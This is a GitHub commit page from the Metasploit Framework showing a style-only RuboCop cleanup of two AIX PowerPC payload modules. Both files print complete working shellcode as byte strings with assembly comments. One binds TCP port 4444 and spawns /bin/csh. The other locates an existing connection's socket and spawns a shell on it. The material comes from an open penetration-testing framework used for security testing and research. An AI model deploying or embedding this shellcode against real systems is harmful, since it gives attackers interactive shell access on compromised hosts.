Skip to content

Commit dd68516

Browse files
adfoster-r7adfoster-r7
authored
Merge pull request rapid7#20066 from bcoles/rubocop-modules-payloads-singles
modules/payloads/singles: Resolve RuboCop violations
2 parents 0c31102 + 03f4c46 commit dd68516

File tree

282 files changed

+7318
-7348
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

282 files changed

+7318
-7348
lines changed

modules/payloads/singles/aix/ppc/shell_bind_tcp.rb

Lines changed: 81 additions & 82 deletions
Original file line numberDiff line numberDiff line change
@@ -3,112 +3,111 @@
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

6-
76
module MetasploitModule
8-
97
CachedSize = 264
108

119
include Msf::Payload::Single
1210
include Msf::Payload::Aix
1311
include Msf::Sessions::CommandShellOptions
1412

1513
def initialize(info = {})
16-
super(merge_info(info,
17-
'Name' => 'AIX Command Shell, Bind TCP Inline',
18-
'Description' => 'Listen for a connection and spawn a command shell',
19-
'Author' => 'Ramon de C Valle',
20-
'License' => MSF_LICENSE,
21-
'Platform' => 'aix',
22-
'Arch' => ARCH_PPC,
23-
'Handler' => Msf::Handler::BindTcp,
24-
'Session' => Msf::Sessions::CommandShellUnix,
25-
'Payload' =>
26-
{
14+
super(
15+
merge_info(
16+
info,
17+
'Name' => 'AIX Command Shell, Bind TCP Inline',
18+
'Description' => 'Listen for a connection and spawn a command shell',
19+
'Author' => 'Ramon de C Valle',
20+
'License' => MSF_LICENSE,
21+
'Platform' => 'aix',
22+
'Arch' => ARCH_PPC,
23+
'Handler' => Msf::Handler::BindTcp,
24+
'Session' => Msf::Sessions::CommandShellUnix,
25+
'Payload' => {
2726
'Offsets' =>
28-
{
29-
'LPORT' => [ 82, 'n' ],
30-
},
27+
{
28+
'LPORT' => [ 82, 'n' ]
29+
}
3130
}
32-
))
33-
31+
)
32+
)
3433
end
3534

3635
def generate(*args)
3736
super(*args)
3837

3938
payload =
40-
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
41-
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
42-
"\x7f\xc8\x02\xa6" + # mflr r30 #
43-
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
44-
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
45-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
46-
"\x4e\x80\x04\x20" + # bctr #
47-
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
48-
"\x44\xff\xff\x02" + # svca 0 #
49-
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
50-
"\x3b\xa0\x07\xff" + # lil r29,2047 #
51-
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
52-
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
53-
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
39+
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
40+
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
41+
"\x7f\xc8\x02\xa6" + # mflr r30 #
42+
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
43+
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
44+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
45+
"\x4e\x80\x04\x20" + # bctr #
46+
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
47+
"\x44\xff\xff\x02" + # svca 0 #
48+
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
49+
"\x3b\xa0\x07\xff" + # lil r29,2047 #
50+
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
51+
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
52+
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
5453
@cal_socket +
55-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
56-
"\x4e\x80\x04\x21" + # bctrl #
57-
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
58-
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
59-
"\x3f\x60\xff\x02" + # liu r27,-254 #
60-
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
61-
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
62-
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
63-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
54+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
55+
"\x4e\x80\x04\x21" + # bctrl #
56+
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
57+
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
58+
"\x3f\x60\xff\x02" + # liu r27,-254 #
59+
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
60+
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
61+
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
62+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
6463
@cal_bind +
65-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
66-
"\x4e\x80\x04\x21" + # bctrl #
67-
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
68-
"\x7f\x83\xe3\x78" + # mr r3,r28 #
64+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
65+
"\x4e\x80\x04\x21" + # bctrl #
66+
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
67+
"\x7f\x83\xe3\x78" + # mr r3,r28 #
6968
@cal_listen +
70-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
71-
"\x4e\x80\x04\x21" + # bctrl #
72-
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
73-
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
74-
"\x7f\x83\xe3\x78" + # mr r3,r28 #
69+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
70+
"\x4e\x80\x04\x21" + # bctrl #
71+
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
72+
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
73+
"\x7f\x83\xe3\x78" + # mr r3,r28 #
7574
@cal_accept +
76-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
77-
"\x4e\x80\x04\x21" + # bctrl #
78-
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
79-
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
80-
"\x7f\x23\xcb\x78" + # mr r3,r25 #
75+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
76+
"\x4e\x80\x04\x21" + # bctrl #
77+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
78+
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
79+
"\x7f\x23\xcb\x78" + # mr r3,r25 #
8180
@cal_close +
82-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
83-
"\x4e\x80\x04\x21" + # bctrl #
84-
"\x7f\x25\xcb\x78" + # mr r5,r25 #
85-
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
86-
"\x7f\x43\xd3\x78" + # mr r3,r26 #
81+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
82+
"\x4e\x80\x04\x21" + # bctrl #
83+
"\x7f\x25\xcb\x78" + # mr r5,r25 #
84+
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
85+
"\x7f\x43\xd3\x78" + # mr r3,r26 #
8786
@cal_kfcntl +
88-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
89-
"\x4e\x80\x04\x21" + # bctrl #
90-
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
91-
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
92-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
93-
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
94-
"\x7f\x08\x02\xa6" + # mflr r24 #
95-
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
96-
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
97-
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
98-
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
99-
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
100-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
87+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
88+
"\x4e\x80\x04\x21" + # bctrl #
89+
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
90+
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
91+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
92+
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
93+
"\x7f\x08\x02\xa6" + # mflr r24 #
94+
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
95+
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
96+
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
97+
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
98+
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
99+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
101100
@cal_execve +
102-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
103-
"\x4e\x80\x04\x21" + # bctrl #
104-
"/bin/csh"
101+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
102+
"\x4e\x80\x04\x21" + # bctrl #
103+
'/bin/csh'
105104

106-
# If the payload is generated and there are offsets to substitute,
107-
# do that now.
108-
if (payload and offsets)
109-
substitute_vars(payload, offsets)
110-
end
105+
# If the payload is generated and there are offsets to substitute,
106+
# do that now.
107+
if payload && offsets
108+
substitute_vars(payload, offsets)
109+
end
111110

112-
payload
111+
payload
113112
end
114113
end

modules/payloads/singles/aix/ppc/shell_find_port.rb

Lines changed: 72 additions & 73 deletions
Original file line numberDiff line numberDiff line change
@@ -3,98 +3,97 @@
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

6-
76
module MetasploitModule
8-
97
CachedSize = 220
108

119
include Msf::Payload::Single
1210
include Msf::Payload::Aix
1311
include Msf::Sessions::CommandShellOptions
1412

1513
def initialize(info = {})
16-
super(merge_info(info,
17-
'Name' => 'AIX Command Shell, Find Port Inline',
18-
'Description' => 'Spawn a shell on an established connection',
19-
'Author' => 'Ramon de C Valle',
20-
'License' => MSF_LICENSE,
21-
'Platform' => 'aix',
22-
'Arch' => ARCH_PPC,
23-
'Handler' => Msf::Handler::FindPort,
24-
'Session' => Msf::Sessions::CommandShellUnix,
25-
'Payload' =>
26-
{
14+
super(
15+
merge_info(
16+
info,
17+
'Name' => 'AIX Command Shell, Find Port Inline',
18+
'Description' => 'Spawn a shell on an established connection',
19+
'Author' => 'Ramon de C Valle',
20+
'License' => MSF_LICENSE,
21+
'Platform' => 'aix',
22+
'Arch' => ARCH_PPC,
23+
'Handler' => Msf::Handler::FindPort,
24+
'Session' => Msf::Sessions::CommandShellUnix,
25+
'Payload' => {
2726
'Offsets' =>
28-
{
29-
'CPORT' => [ 106, 'n' ],
30-
},
27+
{
28+
'CPORT' => [ 106, 'n' ]
29+
}
3130
}
32-
))
33-
31+
)
32+
)
3433
end
3534

3635
def generate(*args)
3736
super(*args)
3837

3938
payload =
40-
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
41-
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
42-
"\x7f\xc8\x02\xa6" + # mflr r30 #
43-
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
44-
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
45-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
46-
"\x4e\x80\x04\x20" + # bctr #
47-
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
48-
"\x44\xff\xff\x02" + # svca 0 #
49-
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
50-
"\x3b\xa0\x07\xff" + # lil r29,2047 #
51-
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
52-
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
53-
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
54-
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
55-
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
56-
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
57-
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
58-
"\x7f\x65\xdb\x78" + # mr r5,r27 #
59-
"\x7f\x84\xe3\x78" + # mr r4,r28 #
60-
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
61-
@cal_getpeername +
62-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
63-
"\x4e\x80\x04\x21" + # bctrl #
64-
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
65-
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
66-
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
67-
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
68-
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
69-
"\x7f\x23\xcb\x78" + # mr r3,r25 #
70-
@cal_close +
71-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
72-
"\x4e\x80\x04\x21" + # bctrl #
73-
"\x7f\x25\xcb\x78" + # mr r5,r25 #
74-
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
75-
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
76-
@cal_kfcntl +
77-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
78-
"\x4e\x80\x04\x21" + # bctrl #
79-
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
80-
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
81-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
82-
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
83-
"\x7f\x08\x02\xa6" + # mflr r24 #
84-
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
85-
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
86-
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
87-
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
88-
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
89-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
90-
@cal_execve +
91-
"\x7f\xc9\x03\xa6" + # mtctr r30 #
92-
"\x4e\x80\x04\x21" + # bctrl #
93-
"/bin/csh"
39+
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
40+
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
41+
"\x7f\xc8\x02\xa6" + # mflr r30 #
42+
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
43+
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
44+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
45+
"\x4e\x80\x04\x20" + # bctr #
46+
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
47+
"\x44\xff\xff\x02" + # svca 0 #
48+
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
49+
"\x3b\xa0\x07\xff" + # lil r29,2047 #
50+
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
51+
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
52+
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
53+
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
54+
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
55+
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
56+
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
57+
"\x7f\x65\xdb\x78" + # mr r5,r27 #
58+
"\x7f\x84\xe3\x78" + # mr r4,r28 #
59+
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
60+
@cal_getpeername +
61+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
62+
"\x4e\x80\x04\x21" + # bctrl #
63+
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
64+
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
65+
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
66+
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
67+
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
68+
"\x7f\x23\xcb\x78" + # mr r3,r25 #
69+
@cal_close +
70+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
71+
"\x4e\x80\x04\x21" + # bctrl #
72+
"\x7f\x25\xcb\x78" + # mr r5,r25 #
73+
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
74+
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
75+
@cal_kfcntl +
76+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
77+
"\x4e\x80\x04\x21" + # bctrl #
78+
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
79+
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
80+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
81+
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
82+
"\x7f\x08\x02\xa6" + # mflr r24 #
83+
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
84+
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
85+
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
86+
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
87+
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
88+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
89+
@cal_execve +
90+
"\x7f\xc9\x03\xa6" + # mtctr r30 #
91+
"\x4e\x80\x04\x21" + # bctrl #
92+
'/bin/csh'
9493

9594
# If the payload is generated and there are offsets to substitute,
9695
# do that now.
97-
if (payload and offsets)
96+
if payload && offsets
9897
substitute_vars(payload, offsets)
9998
end
10099

0 commit comments

Comments
 (0)